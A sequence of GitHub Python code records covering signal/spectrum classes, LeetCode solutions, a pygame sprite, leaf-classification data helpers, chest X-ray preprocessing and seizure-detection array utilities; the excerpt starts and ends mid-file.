An instance of `Relation` class will be converted into\r\n the instance of `Spectrum` class.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n frequency: Union[Relation, NDArray],\r\n spectrum_amplitude: NDArray = None,\r\n df: float = None,\r\n **kwargs\r\n ) -> None:\r\n super().__init__(frequency, spectrum_amplitude, df)\r\n self._spectrum2signal_method_default = Config.spectrum2signal_method\r\n self.signal: Optional[Signal] = None\r\n\r\n @property\r\n def frequency(self):\r\n return self.x\r\n\r\n @property\r\n def spectrum_amplitude(self):\r\n return self.y\r\n\r\n @property\r\n def df(self):\r\n return self.dx\r\n\r\n @df.setter\r\n def df(self, value: float):\r\n self.dx = value\r\n\r\n def get_signal(self, recalculate=False, start_time: float = None) -> \"Signal\":\r\n \"\"\"Compute the signal from the spectrum.\"\"\"\r\n\r\n if self.signal is None or recalculate:\r\n time, amplitude = self._spectrum2signal_method_default(\r\n self._x, self._y, start_time\r\n )\r\n self.signal = Signal(time, amplitude)\r\n return self.signal\r\n\r\n def get_amp_spectrum(self: R, **kwargs) -> \"Relation\":\r\n \"\"\"Amplitude spectrum.\r\n\r\n Calculate the relationship between the frequency and the absolute\r\n value of the spectrum amplitude.\"\"\"\r\n\r\n x, y = self.get_data()\r\n return Relation(x, np.abs(y))\r\n\r\n def get_phase_spectrum(self: R, **kwargs) -> \"Relation\":\r\n \"\"\"Calculate the relationship between frequency and phase of the spectrum.\"\"\"\r\n x, y = self.get_data()\r\n return Relation(x, np.unwrap(np.angle(y)))\r\n\r\n def get_reverse_filter(\r\n self: SP,\r\n percent: Union[float, int] = 5.0,\r\n subtrack_phase=True,\r\n frequency_start: float = None,\r\n frequency_end: float = None,\r\n **kwargs\r\n ) -> SP:\r\n \"\"\"Calculate filter of reversed signal.\r\n\r\n **Properties**:\r\n > **percent**: `Union[float, int]`\r\n level of added white noise in percent\r\n\r\n **subtrack_phase**: True\r\n If True performs phase subtraction,\r\n If False succeeds, add the phase.\r\n\r\n **frequency_start**: `float`**\r\n Start frequency.\r\n\r\n **frequency_end**: `float`\r\n End frequency.\r\n\r\n \"\"\"\r\n spectrum = self.select_data(frequency_start, frequency_end)\r\n abs_spectrum = spectrum.get_amp_spectrum()\r\n abs_spectrum = abs_spectrum + abs_spectrum.max() * percent / 100\r\n reversed_abs_spectrum = 1 / abs_spectrum\r\n\r\n if subtrack_phase:\r\n phase_spectrum = -1 * spectrum.get_phase_spectrum()\r\n else:\r\n phase_spectrum = 1 * spectrum.get_phase_spectrum()\r\n\r\n result_spectrum = type(self).get_spectrum_from_amp_phase(\r\n reversed_abs_spectrum, phase_spectrum, **kwargs\r\n )\r\n return result_spectrum\r\n\r\n def add_phase(self: SP, other: SSPR, **kwargs) -> SP:\r\n sp_other = _input2spectrum(other)\r\n return type(self).get_spectrum_from_amp_phase(\r\n self.get_amp_spectrum(),\r\n self.get_phase_spectrum() + sp_other.get_phase_spectrum(),\r\n **kwargs\r\n )\r\n\r\n def sub_phase(self: SP, other: SSPR, **kwargs) -> SP:\r\n sp_other = _input2spectrum(other)\r\n return type(self).get_spectrum_from_amp_phase(\r\n self.get_amp_spectrum(),\r\n self.get_phase_spectrum() - sp_other.get_phase_spectrum(),\r\n **kwargs\r\n )\r\n\r\n @classmethod\r\n def get_spectrum_from_amp_phase(\r\n cls: Type[SP], s1: Relation, s2: Relation, **kwargs\r\n ) -> SP:\r\n \"\"\"Calculate of the spectrum from the amplitude and frequency spectrum.\r\n\r\n The spectrum is calculated through the amplitude and phase spectrum\r\n using the formula abs*exp(1j*phase).\"\"\"\r\n\r\n return cls(s1 * 
((1.0j * s2).exp()), **kwargs)\r\n\r\n @classmethod\r\n def convolve(cls: Type[SP], r1: SSPR, r2: SSPR, **kwargs) -> SP:\r\n sp_r1 = _input2spectrum(r1)\r\n sp_r2 = _input2spectrum(r2)\r\n return super().convolve(sp_r1, sp_r2, **kwargs)\r\n\r\n @classmethod\r\n def correlate(cls: Type[SP], r1: SSPR, r2: SSPR, **kwargs) -> SP:\r\n sp_r1 = _input2spectrum(r1)\r\n sp_r2 = _input2spectrum(r2)\r\n return super().correlate(sp_r1, sp_r2, **kwargs)\r\n\r\n def __add__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__add__(r_a, **kwargs)\r\n\r\n def __sub__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__sub__(r_a, **kwargs)\r\n\r\n def __mul__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__mul__(r_a, **kwargs)\r\n\r\n def __truediv__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__truediv__(r_a, **kwargs)\r\n\r\n def __pow__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__pow__(r_a, **kwargs)\r\n\r\n\r\ndef _inp2signal_operation(inp: SSPRN) -> Union[\"Relation\", \"Signal\", Num]:\r\n if isinstance(inp, Spectrum):\r\n return inp.get_signal()\r\n elif isinstance(inp, (Signal, Relation, int, complex, float)):\r\n return inp\r\n else:\r\n raise ConvertingError(type(inp), Signal)\r\n\r\n\r\ndef _inp2signal(inp: SSPR) -> \"Signal\":\r\n if isinstance(inp, Spectrum):\r\n return inp.get_signal()\r\n\r\n elif isinstance(inp, Signal):\r\n return inp\r\n\r\n elif isinstance(inp, Relation):\r\n return Signal(inp)\r\n else:\r\n raise ConvertingError(type(inp), Signal)\r\n\r\n\r\nclass Signal(Relation):\r\n \"\"\"Class describing some kind of signal.\r\n\r\n The `Signal` class inherits the `Relation` class.\r\n\r\n **Properties**:\r\n > **time**: `Union[Relation, NDArray]`\r\n An instance of Relation class or inherited from it, or array_like object\r\n containing numbers (real or complex).\r\n\r\n > **amplitude**: `NDArray`\r\n None or array_like object containing numbers (real or complex).\r\n\r\n > **dt**: `float` = `None`\r\n Sample rate of time-axis\r\n\r\n To convert the signal into a spectrum, the method defined in the `Config`\r\n class is used. (Config.signal2spectrum_method). Current method can be\r\n overridden by own in Config class.\r\n\r\n When performing arithmetic operations on instances of the Spectrum class,\r\n an instance of the `Singal` class will be extracted from\r\n the `Spectrum` instance, and arithmetic operations will be performed\r\n on this instance. 
An instance of `Relation` class will be converted into\r\n the instance of `Signal` class.\r\n\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n time: Union[Relation, np.ndarray],\r\n amplitude: np.ndarray = None,\r\n dt: float = None,\r\n ) -> None:\r\n\r\n self._signal2spectrum_method_default = Config.signal2spectrum_method\r\n super().__init__(time, amplitude, dt)\r\n self._spectrum: Optional[Spectrum] = None\r\n\r\n def get_spectrum(self, recalculate=False, is_start_zero=False) -> \"Spectrum\":\r\n\r\n if self._spectrum is None or recalculate:\r\n f, a = self._signal2spectrum_method_default(*self.get_data(), is_start_zero)\r\n self._spectrum = Spectrum(f, a)\r\n\r\n return self._spectrum\r\n\r\n def get_amplitude_spectrum(\r\n self, recalculate=False, is_start_zero=False\r\n ) -> Relation:\r\n return self.get_spectrum(recalculate, is_start_zero).get_amp_spectrum()\r\n\r\n def get_phase_spectrum(self, recalculate=False, is_start_zero=False) -> Relation:\r\n return self.get_spectrum(recalculate, is_start_zero).get_phase_spectrum()\r\n\r\n def get_reverse_signal(\r\n self: S,\r\n percent: Union[float, int] = 5.0,\r\n subtrack_phase: bool = True,\r\n frequency_start: float = None,\r\n frequency_end: float = None,\r\n **kwargs\r\n ) -> S:\r\n \"\"\"Calculate reversed signal.\r\n\r\n **Properties**:\r\n\r\n > **percent**: `Union[float, int]`\r\n level of added white noise in percent\r\n\r\n > **subtrack_phase**: True\r\n If True performs phase subtraction,\r\n If False succeeds, add the phase.\r\n\r\n > **frequency_start**: float.\r\n Start frequency.\r\n\r\n > **frequency_end**: float\r\n End frequency.\r\n\r\n \"\"\"\r\n signal = (\r\n self.get_spectrum()\r\n .get_reverse_filter(percent, subtrack_phase, frequency_start, frequency_end)\r\n .get_signal()\r\n )\r\n\r\n return type(self)(signal, **kwargs)\r\n\r\n def add_phase(self: S, other: SSPR, **kwargs) -> S:\r\n sp_other = _input2spectrum(other)\r\n self_spectrum = self.get_spectrum()\r\n new_spectrum = Spectrum.get_spectrum_from_amp_phase(\r\n self_spectrum.get_amp_spectrum(),\r\n self_spectrum.get_phase_spectrum() + sp_other.get_phase_spectrum(),\r\n )\r\n return type(self)(new_spectrum.get_signal(), **kwargs)\r\n\r\n def sub_phase(self: S, other: SSPR, **kwargs) -> S:\r\n sp_other = _input2spectrum(other)\r\n self_spectrum = self.get_spectrum()\r\n new_spectrum = Spectrum.get_spectrum_from_amp_phase(\r\n self_spectrum.get_amp_spectrum(),\r\n self_spectrum.get_phase_spectrum() - sp_other.get_phase_spectrum(),\r\n )\r\n return type(self)(new_spectrum.get_signal(), **kwargs)\r\n\r\n @classmethod\r\n def convolve(cls: Type[S], r1: SSPR, r2: SSPR, **kwargs) -> S:\r\n s_r1 = _inp2signal(r1)\r\n s_r2 = _inp2signal(r2)\r\n return cls(super().convolve(s_r1, s_r2), **kwargs)\r\n\r\n @classmethod\r\n def correlate(cls: Type[S], r1: SSPR, r2: SSPR, **kwargs) -> S:\r\n s_r1 = _inp2signal(r1)\r\n s_r2 = _inp2signal(r2)\r\n return cls(super().correlate(s_r1, s_r2), **kwargs)\r\n\r\n def __add__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__add__(s_a, **kwargs)\r\n\r\n def __sub__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__sub__(s_a, **kwargs)\r\n\r\n def __mul__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__mul__(s_a, **kwargs)\r\n\r\n def __truediv__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__truediv__(s_a, **kwargs)\r\n\r\n def __pow__(self: S, a: SSPRN, **kwargs) -> 
S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__pow__(s_a, **kwargs)\r\n","repo_name":"Omnivanitate/sweep_design","sub_path":"sweep_design/math_signals/math_signal.py","file_name":"math_signal.py","file_ext":"py","file_size_in_byte":12734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1612844467","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n # # fancy one liner solution as shared by Stefan Pochmann.\n # return max(list(map(len, ''.join(map(str, nums)).split('0') )))\n \n maxlen = l = 0\n\n for num in nums:\n if num == 1:\n l += 1\n maxlen = max(maxlen, l)\n else: \n l = 0\n \n return maxlen","repo_name":"cindyyj/leetcode_solutions","sub_path":"485-max-consecutive-ones/485-max-consecutive-ones.py","file_name":"485-max-consecutive-ones.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73727669587","text":"import pygame\n\nfrom settings import Settings\n\n\nclass Dinosaur:\n def __init__(self, canvas, landscape):\n self.image = pygame.image.load('dinosaur.png')\n self.canvas = canvas\n self.landscape = landscape\n self.rect = self.image.get_rect()\n self.height = self.rect.height\n\n def draw(self):\n self.canvas.blit(self.image, (Settings.centre_x, self.landscape.dinosaur_height - self.height))\n","repo_name":"CompassMentis/dojo_jan2020","sub_path":"dinosaur.py","file_name":"dinosaur.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40448304606","text":"# -*- coding: utf-8 -*-\n# @author: Boi Mai Quach \n################################################\n\n# from pyexpat import features\nimport sys\nfrom sklearn.model_selection import train_test_split\n# Set seed value\nseed_value = 23\nimport os\nos.environ['PYTHONHASHSEED']=str(seed_value)\n# 2. Set `python` built-in pseudo-random generator at a fixed value\nimport random\nrandom.seed(seed_value)\n# 3. 
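The math_signal.py record builds spectra from amplitude and phase parts via `abs*exp(1j*phase)` (see `get_spectrum_from_amp_phase`). A plain-numpy illustration of that decomposition and its round trip, independent of the sweep_design classes:

```python
# Illustrative only: the amplitude/phase decomposition used by
# get_amp_spectrum / get_phase_spectrum / get_spectrum_from_amp_phase,
# reproduced with numpy primitives.
import numpy as np

t = np.linspace(0.0, 1.0, 256, endpoint=False)
sig = np.sin(2 * np.pi * 5 * t)

spectrum = np.fft.rfft(sig)
amplitude = np.abs(spectrum)                    # cf. get_amp_spectrum
phase = np.unwrap(np.angle(spectrum))           # cf. get_phase_spectrum

# Rebuild the complex spectrum from its two real-valued parts.
rebuilt = amplitude * np.exp(1j * phase)
assert np.allclose(rebuilt, spectrum)
```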
Set `numpy` pseudo-random generator at a fixed value\nimport numpy as np\nnp.random.seed(seed_value)\n\nimport pickle\n\nbreakpoints = [1001,1059,\n 1060,1122,\n 1552,1616,\n 1123,1194,\n 1195,1267,\n 1268,1323,\n 1324,1385,\n 1386,1437,\n 1497,1551,\n 1438,1496,\n 2001,2050,\n 2051,2113,\n 2114,2165,\n 2166,2230,\n 2231,2290,\n 2291,2346,\n 2347,2423,\n 2424,2485,\n 2486,2546,\n 2547,2612,\n 2616,2675,\n 3001,3055,\n 3056,3110,\n 3111,3175,\n 3176,3229,\n 3230,3281,\n 3282,3334,\n 3335,3389,\n 3390,3446,\n 3447,3510,\n 3511,3563,\n 3566,3621]\n\nname_classes = [\"pubescent bamboo\", \"Chinese horse chestnut\", \"Anhui Barberry\", \"Chinese redbud\", \"true indigo\",\\\n \"Japanese maple\", \"Nanmu\", \"castor aralia\", \"Chinese cinnamon\", \"goldenrain tree\",\\\n \"Big-fruited Holly\", \"Japanese cheesewood\", \"wintersweet\", \"camphortree\", \"Japan Arrowwood\",\\\n \"sweet osmanthus\", \"deodar\", \"ginkgo-maidenhair tree\", \"Crape myrtle, Crepe myrtle\", \"oleander\",\\\n \"yew plum pine\", \"Japanese Flowering Cherry\", \"Glossy Privet\", \"Chinese Toon\", \"peach\",\\\n \"Ford Woodlotus\", \"trident maple\", \"Beale's barberry\", \"southern magnolia\", \"Canadian poplar\",\\\n \"Chinese tulip tree\", \"tangerine\"]\n\n__features__ = ['image', 'vein', 'xyprojection', 'color', 'texture', 'fourier', 'shape']\n\n__feature_shape__ = {\n\t'image': [300,300,3],\t\n\t'vein': [300,300],\t\n\t'xyprojection': [60,],\n\t'color': [36,],\n\t'texture': [13,],\n\t'fourier': [40,],\n\t'shape': [38,],\n}\n\n__feature_files__ = {\n 'image': \"data/features/images.npy\",\n\t'vein': \"data/features/vein.npy\",\n\t'xyprojection': \"data/features/xyprojection.npy\",\n\t'color': \"data/features/color.npy\",\n\t'texture': \"data/features/texture.npy\",\n\t'fourier': \"data/features/fourier.npy\",\n\t'shape': \"data/features/shape.npy\",\n}\n\n__result_files__ ={\n\t'prediction': \"data/interim/predicted_data.npy\",\n\t'true': \"data/interim/actual_data.npy\",\n\t'false': \"data/interim/false_data.npy\",\n\t'kfold_val_acc': \"data/interim/kfold_val_acc.npy\",\n\t'kfold_test_acc': \"data/interim/kfold_test_acc.npy\",\n}\n\n__visualisation_files__ = {\n\t'result_table': \"reports/kfold_accuracy.csv\", \n\t'confusion_matrix': \"reports/figures/confusion_matrix.png\",\n\t'misclassified_images': \"reports/figures/misclassified_leave_prediction.png\",\n}\n\n\n__label_files__ ={\n\t'labels': \"data/processed/labels/labels.npy\",\n\t'mapping_names': \"data/processed/labels/mapping_names.pkl\"\n} \n\n__normalizing_features__ = ['color', 'texture', 'fourier', 'shape', \"combine\"]\n\n__index_dataset__ = \"data/external/prod_dataset_indexed.csv\"\n\n__index_kfold__ = \"data/external/Dataset_10FoldCV_indexed.csv\"\n\n__model_file__ = \"ENCODER-{}-l2rate{}-dropout{}-fold{}.h5\"\n__prod_encoder_file__ = \"PROD_ENCODER-{}-l2rate{}-dropout{}.h5\"\n\n__models_folder__ = \"models/Dataset_10FoldCV_indexed_models\"\n__prod_encoders_folder__ = \"models/prod_models/encoders\"\n__prod_decoders_folder__ = \"models/prod_models/decoders\"\n\n__encoder_performances_file__ = \"data/interim/Dataset_10FoldCV_indexed_encoders_performances.csv\"\n\n__prod_encoder_performance_file__ = \"data/interim/prod_encoders_performances.csv\"\n\n__best_encoder_file__ = \"data/interim/train_encoders_best.csv\"\n\n__decoder_file__ = \"DECODER-fold{}.pickle\"\n__prod_decoder_file__ = \"PROD_DECODER.pickle\"\n\n__decoder_performances_file__ = \"data/interim/Dataset_10FoldCV_indexed_decoders_performances.csv\"\n\nprod_parameters = {\n \"image\": 
(0.0001, 0.5),\n \"vein\" : (0.001, 0.5),\n \"xyprojection\": (0.1, 0.5),\n \"color\": (0.01, 0.5),\n \"texture\": (0.01, 0.5),\n \"fourier\": (0.1, 0.5),\n \"shape\": (0.001, 0.5)\n }\n\nnum_folds = 10\n\n\ndef progressBar(value, endvalue, bar_length=20):\n\n \"\"\" Runs the loading bar to observe the process\n \"\"\"\n\n percent = float(value) / endvalue\n arrow = '-' * int(round(percent * bar_length)-1) + '>'\n spaces = ' ' * (bar_length - len(arrow))\n\n sys.stdout.write(\"\\rPercent: [{0}] {1}% {2}/{3} \".format(arrow + spaces, int(round(percent * 100)), value, endvalue))\n sys.stdout.flush()\n\ndef load_features(feature):\n if type(feature) == list:\n return [np.load(__feature_files__[f]) for f in feature]\n return np.load(__feature_files__[feature])\n\ndef load_labels():\n return np.load(__label_files__[\"labels\"])\n\ndef load_mapping_name():\n\twith open(__label_files__[\"mapping_names\"], 'rb') as f:\n\t\tmapping_names = pickle.load(f)\n\treturn mapping_names\n\n\ndef normalize_feature_data(feature, X_train, X_valid, X_test):\n \"\"\"normalize data\n any feature in __normalizing_features__ is normalized, otherwise kept intact\n \"\"\"\n if type(feature) == list:\n for i, f in enumerate(feature):\n \n if f in __normalizing_features__:\n stds = np.std(X_train[i], axis=0)\n stds[stds==0.0] = 1.0\n means = np.mean(X_train[i], axis=0)\n X_train[i] = (X_train[i]-means)/stds\n X_valid[i] = (X_valid[i]-means)/stds\n X_test[i] = (X_test[i]-means)/stds\n else:\n if feature in __normalizing_features__:\n stds = np.std(X_train, axis=0)\n stds[stds==0.0] = 1.0\n means = np.mean(X_train, axis=0)\n X_train = (X_train-means)/stds\n X_valid = (X_valid-means)/stds\n X_test = (X_test-means)/stds\n \n return X_train, X_valid, X_test\n\ndef split_train_test_valid(feature, Kfold, fold, X, y):\n \"\"\"split dataset X, y into train, valid, test sets based on kfold and fold\n \"\"\"\n fold = \"Fold_\" + str(fold)\n \n train_index = Kfold[fold] == \"Train\"\n valid_index = Kfold[fold] == \"Valid\"\n test_index = Kfold[fold] == \"Test\"\n\n if type(feature) == list:\n X_train = [x[train_index] for x in X]\n X_valid = [x[valid_index] for x in X]\n X_test = [x[test_index] for x in X]\n else:\n X_train = X[train_index]\n X_valid = X[valid_index]\n X_test = X[test_index]\n\n ## normalize handcrafted features\n X_train, X_valid, X_test = normalize_feature_data(feature, X_train, X_valid, X_test)\n\n y_train = y[train_index]\n y_valid = y[valid_index]\n y_test = y[test_index]\n\n return (X_train, y_train), (X_valid, y_valid), (X_test, y_test)\n\ndef normalize_arr(arr):\n\tstds = np.std(arr)\n\tif stds == 0.0:\n\t\tstds = 1.0\n\tmeans = np.mean(arr)\n\tnorm_arr = (arr-means)/stds\n\treturn norm_arr\n\ndef normalize_feature(X, features):\n\tif len(features) > 1:\n\t\tfor idx, f in enumerate(features): \n\t\t\tif f in __normalizing_features__:\n\t\t\t\tfeature_arr = X[idx].copy()\n\t\t\t\tnew_feature_arr = []\n\t\t\t\tfor item in feature_arr:\n\t\t\t\t\tnorm_arr = normalize_arr(item)\n\t\t\t\t\tnew_feature_arr.append(norm_arr)\n\t\t\t\ttemp = np.asarray(new_feature_arr)\n\t\t\t\tX[idx] = temp\n\n\telse:\n\t\tif features[0] in __normalizing_features__:\n\t\t\tfeature_arr = X.copy()\n\t\t\tnew_feature_arr = []\n\t\t\tfor item in feature_arr:\n\t\t\t\tnorm_arr = normalize_arr(item)\n\t\t\t\tnew_feature_arr.append(norm_arr)\n\t\t\ttemp = np.asarray(new_feature_arr)\n\t\t\tX = temp\n\t\t\n\treturn X\n\n\n\ndef split_train_test_valid_prod(feature, X, y):\n\tX_train = []\n\tX_test = []\n\tX_valid = []\n\n\tif len(feature) 
> 1:\n\t\tfor i in range(len(feature)):\n\t\t\ttrain, test, y_train, y_test = train_test_split(X[i], y, test_size=0.2, random_state=seed_value)\n\t\t\ttest, valid, y_test, y_valid = train_test_split(test, y_test, test_size=0.5, random_state=seed_value)\n\t\t\tX_train.append(train)\n\t\t\tX_test.append(test)\n\t\t\tX_valid.append(valid)\n\telse:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X[0], y, test_size=0.2, random_state=seed_value)\n\t\tX_test, X_valid, y_test, y_valid = train_test_split(X_test, y_test, test_size=0.5, random_state=seed_value)\n\n\t## normalize handcrafted features\n\tX_train = normalize_feature(X_train, feature)\n\tX_valid = normalize_feature(X_valid, feature)\n\tX_test = normalize_feature(X_test, feature)\n\t# X_train, X_valid, X_test = normalize_feature_data(feature, X_train, X_valid, X_test)\n\n\treturn (X_train, y_train), (X_valid, y_valid), (X_test, y_test)\n\n\t\n","repo_name":"Tayerquach/Leave_Classfication","sub_path":"src/helper/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7733302011","text":"\"\"\"NIH Chest X-ray dataset, multi-classification pre-processing (train/test split)\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport random\n\ndf = pd.read_csv('/home/nyh/cxr_mc/Data_Entry_2017.csv')\n\nimage_index = df['Image Index']\nfinding_labels = df['Finding Labels']\npd.DataFrame(pd.value_counts(finding_labels)).to_csv('/home/nyh/cxr_mc/stats.csv')\ndisease_list = pd.DataFrame(pd.value_counts([a for a in finding_labels if '|' not in a]))\ndisease_list.to_csv('/home/nyh/cxr_mc/unique_stats.csv')\n\ninput_dir = '/home/nyh/cxr_mc/images/'\noutput_dir = '/home/nyh/cxr_mc/scaled/'\nsave_dir = '/home/nyh/cxr_mc/saved/'\n\ndef proc(disease_name):\n image_list = list(image_index[finding_labels == disease_name])\n image_data = np.zeros((len(image_list), 224, 224, 1), 'uint8')\n for i, fn in enumerate(image_list):\n if i % 100 == 0:\n print(disease_name, '{}/{}'.format(i, len(image_list)), fn)\n image = cv2.imread(input_dir + fn)\n image = cv2.resize(image, (224, 224))\n image_data[i, :, :, 0] = image[:, :, 0]\n\n\n print('saving ...')\n np.save(save_dir + disease_name + '.npy', image_data)\n\n\n# from concurrent.futures import ThreadPoolExecutor\n# with ThreadPoolExecutor(10) as e:\n# for dname in disease_list.index:\n# e.submit(proc, dname)\n\nimport keras.utils\nclass_n = 4\ntrain_x = []\ntrain_y = []\ntest_x = []\ntest_y = []\nval_x = []\nval_y = []\nfor i, dname in enumerate([disease_list.index[i] for i in (0,4,5,6)]):\n print(dname)\n print('reading npy ...')\n image_data = np.load(save_dir + dname + '.npy')\n n_image = image_data.shape[0]\n n_test = (n_image//8)\n n_val = (n_image-n_test)//30\n n_train = n_image - n_test - n_val\n print('train:val:test = {}:{}:{}, val+test={}'.format(n_train, n_val, n_test, n_val+n_test))\n test_x.append(image_data[-(n_test+n_val):])\n test_y.append(keras.utils.to_categorical([i] * (n_test+n_val), class_n))\n val_x.append(image_data[-(n_test+n_val):-n_test])\n val_y.append(keras.utils.to_categorical([i]*n_val, class_n))\n train_x.append(image_data[:n_train])\n train_y.append(keras.utils.to_categorical([i]*n_train, class_n))\n\nprint('concatenating...')\nnp.save(save_dir + 'ub4_0456_train_x.npy', np.concatenate(train_x))\nnp.save(save_dir + 'ub4_0456_train_y.npy', np.concatenate(train_y))\nnp.save(save_dir + 'ub4_0456_val_x.npy', 
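`normalize_feature_data` in the helpers.py record fits the mean and standard deviation on the training split only, guards against zero variance, then applies the same statistics to the other splits. A distilled, self-contained version of that pattern (array shapes here are arbitrary):

```python
import numpy as np

def fit_normalizer(train):
    stds = np.std(train, axis=0)
    stds[stds == 0.0] = 1.0           # zero-variance guard, as in the record
    means = np.mean(train, axis=0)
    return means, stds

rng = np.random.default_rng(23)
X_train = rng.normal(size=(80, 4))
X_test = rng.normal(size=(20, 4))

means, stds = fit_normalizer(X_train)
X_train = (X_train - means) / stds
X_test = (X_test - means) / stds      # same statistics: no train/test leakage
```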
np.concatenate(val_x))\nnp.save(save_dir + 'ub4_0456_val_y.npy', np.concatenate(val_y))\nnp.save(save_dir + 'ub4_0456_test_x.npy', np.concatenate(test_x))\nnp.save(save_dir + 'ub4_0456_test_y.npy', np.concatenate(test_y))\n\n","repo_name":"zzdyyy/Understanding-Adversarial-Attacks-MIA","sub_path":"cxr_mc_proc.py","file_name":"cxr_mc_proc.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"22438111550","text":"class Solution:\n def smallestDistancePair(self, nums, k):\n import bisect\n\n nums.sort()\n l, r = (\n min(nums[i + 1] - nums[i] for i in range(len(nums) - 1)),\n nums[-1] - nums[0],\n )\n while l < r:\n m = (l + r) // 2\n c = sum(\n bisect.bisect_right(nums, nums[i] + m, i + 1) - i - 1\n for i in range(len(nums) - 1)\n )\n if c >= k:\n r = m\n else:\n l = m + 1\n return l\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.smallestDistancePair([9, 10, 7, 10, 6, 1, 5, 4, 9, 8], 18))\n","repo_name":"MadSkittles/leetcode","sub_path":"719.py","file_name":"719.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2350646842","text":"# -*- coding: utf-8 -*-\n\n### -------------- IMPORTS -------------- ###\nimport numpy as np\nfrom numba import jit\nfrom scipy import signal\n### ------------------------------------- ###\n\n\ndef chunk_array(start, stop, div):\n \"\"\"\n Get array to read labchart in chunks.\n \n Parameters\n ----------\n start : int\n stop : int\n div : int,\n\n Returns\n -------\n idx : numpy array, 1st col = start, 2nd col = stop\n\n \"\"\"\n\n rem = (stop-start+1) % div\n trim_stop = (stop - rem)\n temp_idx = np.linspace(start, trim_stop, round(trim_stop/div)+1, dtype=int)\n temp_idx = np.append(temp_idx, stop)\n temp_idx = np.unique(temp_idx)\n \n # reshape into 2 column format\n idx = np.zeros((len(temp_idx)-1, 2), dtype=int)\n idx[:, 0] = temp_idx[:-1]\n idx[:, 1] = temp_idx[1:]\n idx[1:, 0] += 1\n return idx\n\n@jit(nopython=True)\ndef find_value(array, value, start=1, order=1):\n \"\"\"\n Find exact value in array.\n \n --- Examples ---\n a = np.array([1.5, 2,.5, 3.5, 5, 15])\n idx = find_value(a, 2, start = 1, order = 1)\n \n Parameters\n ----------\n array : array\n value : int/float, value to be found.\n start = int, starting index\n order : 1, search forwards\n :-1, search reverse\n\n Returns\n -------\n index, array\n \"\"\" \n\n if order == 1:\n for i in range(start, len(array)):\n if array[i] == value:\n return int(i)\n \n elif order == -1:\n for i in range(start, -1, -1):\n if array[i] == value:\n return int(i)\n \n@jit(nopython=True) \ndef remove_zeros(ref_pred, pred_array, bounds):\n \"\"\" \n Replace values with zeros.\n \n Parameters\n ----------\n ref_pred : ndarray, boolean array\n pred_array : ndarray, boolean array\n bounds : list, (elements remove before, after detected seizure)\n\n Returns\n -------\n ref_pred : ndarray (szr_n,2), neighbor threshold\n\n \"\"\"\n # remove neighbours that have zeros\n for i in range(bounds[0], pred_array.shape[0] - bounds[1]):\n if np.sum(pred_array[i-bounds[0]:i+bounds[1]+1]) != np.sum(bounds)+1:\n ref_pred[i] = 0\n return ref_pred\n \n\ndef find_szr_idx(pred_array, dur=0):\n \"\"\"\n find seizure bounds.\n idx_bounds = find_szr_idx(rawpred, np.array([2,2]))\n \n Parameters\n ----------\n pred_array : ndarray, boolean array\n bounds: two element list, denoting neighbours bounds \n \n 
Returns\n -------\n idx_bounds : NUMPY ARRAY (szr_n,2)\n index bounds for seizures.\n \n \"\"\"\n \n # make a copy of the array\n ref_pred = np.copy(pred_array)\n \n # get min peak distance\n distance = 1\n \n # append 1 to beginning and end\n ref_pred = np.concatenate((np.zeros(1), ref_pred, np.zeros(1)))\n \n # get signal peaks \n idx = signal.find_peaks(ref_pred, height = 1, distance = distance)[0]\n \n # get index bounds\n idx_bounds = np.zeros([len(idx),2], dtype=int)\n \n for i in range(len(idx)):\n idx_bounds[i,0] = find_value(ref_pred, 0, start = idx[i], order = -1) + 1\n idx_bounds[i,1] = find_value(ref_pred, 0, start = idx[i], order = 1) - 1\n \n # remove seizures smaller than dur \n idx_length = idx_bounds[:,1] - idx_bounds[:,0]\n idx_bounds = idx_bounds[idx_length>=dur,:]\n \n # get original index\n idx_bounds = idx_bounds-1\n \n return idx_bounds\n\n\ndef merge_close(bounds, merge_margin = 5):\n \"\"\"\n merge_close(bounds, merge_margin = 5)\n\n Parameters\n ----------\n bounds : 2D ndarray (rows = seizure segments, columns =[start,stop])\n merge_margin : Int, optional\n\n Returns\n -------\n bounds_out : 2D ndarray, merged array (rows = seizure segments, columns =[start,stop])\n\n \"\"\"\n \n if bounds.shape[0] < 2: # if less than two seizures exit\n return bounds\n \n # copy of bounds\n bounds_out = np.copy(bounds) \n\n # find bounds separated by less than merge_margin\n delta = bounds[1:,0] - bounds[:-1,1]\n merge_idx = delta < merge_margin; \n \n # padd with zeros for peak detection\n element = 